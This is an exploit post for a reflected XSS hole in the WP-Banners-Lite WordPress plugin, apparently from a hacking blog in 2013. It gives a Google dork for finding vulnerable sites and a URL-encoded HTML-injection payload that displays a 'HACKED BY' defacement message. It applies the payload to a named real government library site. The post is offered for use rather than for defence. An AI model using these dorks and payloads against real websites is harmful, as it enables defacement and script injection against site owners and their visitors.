Search Bare

Online Users

WP-Banners-Lite (Wordpress plugin) XSS vulnerablity

# Exploit Title:WP-Banners-Lite (Wordpress plugin) XSS vulnerablity
# Author: ISLAM HACKER PC
# Category:: webapps
# Google dork: inurl:'wpbanners_show.php?id='
==================================
Exploit :
When you put dork on google you will got many sites example :
http://shjlib.gov.ae/ar/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_

Now Put %3Cbody%20bgcolor=black%3E%3Cfont%20color=00ff2a%3C/%3E%3C/br%3E YOUR MESSAGE HERE %20PC%20%3C/br%3E%3Cfont%20C%20%20%3C/%3E%20An%20army%20of%20one%20man%3C/br%3E YOUR EMEIL OR CREETZ HERE %3C/a%3E%3Cfont%20C


It's will be Like this :
http://shjlib.gov.ae/ar/wp-content/plugins/wp-banners-lite/wpbanners_show.php?id=1&cid=a_%3Cbody%20bgcolor=black%3E%3Cfont%20color=00ff2a%3C/%3E%3C/br%3EHACKED%20BY%20IsLaM%20HaCKer%20+%C2%B2+%20bond%20benz%20PC%20%3C/br%3E%3Cfont%20C%20%20%3C/%3E%20An%20army%20of%20one%20man%3C/br%3Ehttps://www.facebook.com/islamo.tmax.7%3C/a%3E%3Cfont%20C




===================================
Greet'Z To : BOND BENZ & DARKY DZ & YACIN JOCKER & XDJAMIL JOCKER &r00tsect0r TEAM & And All Muslimans Hackers

Outlaws-Lab 05/05/2013

1 comments:

Unknown a dit…

Nice find :)

Enregistrer un commentaire

 
Flag Counter